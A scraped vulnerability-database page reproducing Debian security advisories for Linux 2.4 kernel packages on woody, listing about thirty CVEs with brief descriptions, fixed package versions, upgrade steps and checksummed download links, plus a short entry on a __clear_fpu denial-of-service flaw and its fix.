CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.18-14.4
     Alpha architecture              2.4.18-15woody1
     Intel IA-32 architecture        2.4.18-13.2
     HP Precision architecture       62.4 
     PowerPC architecture            2.4.18-1woody6
     PowerPC architecture/XFS        20020329woody1            
     PowerPC architecture/benh       20020304woody1
     Sun Sparc architecture          22woody1    

We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj
wYGegwosZg6xi3oI77opLQY=
=eu/T
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息 (F46506)

Debian Linux Security Advisory 1067-1 (PacketStormID:F46506)
2006-05-22 00:00:00
Debian,Dann Frazier  debian.org
advisory,remote,denial of service,arbitrary,kernel,local,vulnerability
linux,debian
CVE-2004-0427,CVE-2005-0489,CVE-2004-0394,CVE-2004-0447,CVE-2004-0554,CVE-2004-0565,CVE-2004-0685,CVE-2005-0001,CVE-2004-0883,CVE-2004-0949,CVE-2004-1016,CVE-2004-1333,CVE-2004-0997,CVE-2004-1335,CVE-2004-1017,CVE-2005-0124,CVE-2005-0528,CVE-2003-0984
[点击下载]

Debian Security Advisory 1067-1 - Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1067-1                    security@debian.org
http://www.debian.org/security/               Martin Schulze, Dann Frazier
May 20th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : kernel-source-2.4.16,kernel-image-2.4.16-lart,kernel-image-2.4.16-riscpc,kernel-image-2.4.16-netwinder
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code. The Common Vulnerabilities and Exposures project identifies the
following problems:


 CVE-2004-0427

     A local denial of service vulnerability in do_fork() has been found.     

 CVE-2005-0489

     A local denial of service vulnerability in proc memory handling has
     been found.

 CVE-2004-0394

     A buffer overflow in the panic handling code has been found.

 CVE-2004-0447

     A local denial of service vulnerability through a null pointer
     dereference in the IA64 process handling code has been found.

 CVE-2004-0554

     A local denial of service vulnerability through an infinite loop in
     the signal handler code has been found.

 CVE-2004-0565

     An information leak in the context switch code has been found on
     the IA64 architecture.

 CVE-2004-0685

     Unsafe use of copy_to_user in USB drivers may disclose sensitive
     information.

 CVE-2005-0001

     A race condition in the i386 page fault handler may allow privilege
     escalation.

 CVE-2004-0883

     Multiple vulnerabilities in the SMB filesystem code may allow denial
     of service of information disclosure.

 CVE-2004-0949

     An information leak discovered in the SMB filesystem code.

 CVE-2004-1016

     A local denial of service vulnerability has been found in the SCM layer.

 CVE-2004-1333

     An integer overflow in the terminal code may allow a local denial of
     service vulnerability.

 CVE-2004-0997

     A local privilege escalation in the MIPS assembly code has been found.
 
 CVE-2004-1335
 
     A memory leak in the ip_options_get() function may lead to denial of
     service.
      
 CVE-2004-1017

     Multiple overflows exist in the io_edgeport driver which might be usable
     as a denial of service attack vector.
 
 CVE-2005-0124

     Bryan Fulton reported a bounds checking bug in the coda_pioctl function
     which may allow local users to execute arbitrary code or trigger a denial
     of service attack.

 CVE-2005-0528

     A local privilege escalation in the mremap function has been found

 CVE-2003-0984

     Inproper initialization of the RTC may disclose information.

 CVE-2004-1070

     Insufficient input sanitising in the load_elf_binary() function may
     lead to privilege escalation.

 CVE-2004-1071

     Incorrect error handling in the binfmt_elf loader may lead to privilege
     escalation.

 CVE-2004-1072

     A buffer overflow in the binfmt_elf loader may lead to privilege
     escalation or denial of service.

 CVE-2004-1073

     The open_exec function may disclose information.

 CVE-2004-1074

     The binfmt code is vulnerable to denial of service through malformed
     a.out binaries.

 CVE-2004-0138

     A denial of service vulnerability in the ELF loader has been found.

 CVE-2004-1068

     A programming error in the unix_dgram_recvmsg() function may lead to
     privilege escalation.

 CVE-2004-1234

     The ELF loader is vulnerable to denial of service through malformed
     binaries.

 CVE-2005-0003

     Crafted ELF binaries may lead to privilege escalation, due to 
     insufficient checking of overlapping memory regions.

 CVE-2004-1235

     A race condition in the load_elf_library() and binfmt_aout() functions
     may allow privilege escalation.

 CVE-2005-0504

     An integer overflow in the Moxa driver may lead to privilege escalation.

 CVE-2005-0384

     A remote denial of service vulnerability has been found in the PPP
     driver.

 CVE-2005-0135

     An IA64 specific local denial of service vulnerability has been found
     in the unw_unwind_to_user() function.

The following matrix explains which kernel version for which architecture
fix the problems mentioned above:

                                     Debian 3.0 (woody)
     Source                          2.4.16-1woody2
     arm/lart                        20040419woody1
     arm/netwinder                   20040419woody1
     arm/riscpc                      20040419woody1

We recommend that you upgrade your kernel package immediately and reboot
the machine.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get dist-upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.dsc
      Size/MD5 checksum:      655 cbaba3ab1ea1f99557d717bb19908dc8
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.tar.gz
      Size/MD5 checksum:    16628 c10d76a01d03e58049b594270d7fd7c5
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.dsc
      Size/MD5 checksum:      693 be25ede481365d969f465a0356bfe047
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.tar.gz
      Size/MD5 checksum:    21947 12d6a2977ba7683e48e92293e4a87cf6
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.dsc
      Size/MD5 checksum:      661 6895c73dc50b56d48588e3f053fbcc05
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.tar.gz
      Size/MD5 checksum:    19300 3e60e7aa88e553221264f1b004d9091d
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.dsc
      Size/MD5 checksum:      680 81e8e543d617f8464a222767e18aa261
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.diff.gz
      Size/MD5 checksum:    46430 d164de27560966cb695141de9b004e7e
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16.orig.tar.gz
      Size/MD5 checksum: 29364642 8e42e72848dc5098b6433d66d5cacffc

  ARM architecture:

    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1_arm.deb
      Size/MD5 checksum:   718814 87806c13fa914865ecc00f784c64a8f4
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-headers-2.4.16_20040419woody1_arm.deb
      Size/MD5 checksum:  3437272 3061b1a8212d2538bdbffa9609300322
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1_arm.deb
      Size/MD5 checksum:  6675192 b588a74f3b53c06ef3ffb26218c6e191
    http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1_arm.deb
      Size/MD5 checksum:  2914360 3df4986a2bfa64ddea35cb2b76d390a5

  Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-doc-2.4.16_2.4.16-1woody3_all.deb
      Size/MD5 checksum:  1718004 b458e950b6aabb99a781f507c2015dd3
    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3_all.deb
      Size/MD5 checksum: 23820868 3001c4af6222fa22ecba3053a146e248

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEbtDmXm3vHE4uyloRAhZsAJ0Uw7DM7RtiBSmWWskg8FXq0do5TACeMk43
Y8lxItKTeEpmOE/9asuJ6UU=
=fM5d
-----END PGP SIGNATURE-----

    

- 漏洞信息

7077
Linux Kernel __clear_fpu Infinite Loop DoS
Local Access Required Denial of Service, Input Manipulation
Loss of Availability

- 漏洞描述

The Linux kernel contains a flaw that may allow a local denial of service. The issue is triggered when the fsave and frstor instructions are sent in a particular sequence, causing an infinite loop into a floating point exception, and will result in loss of availability for the kernel.

- 时间线

2004-06-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.27, 2.6.8, or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站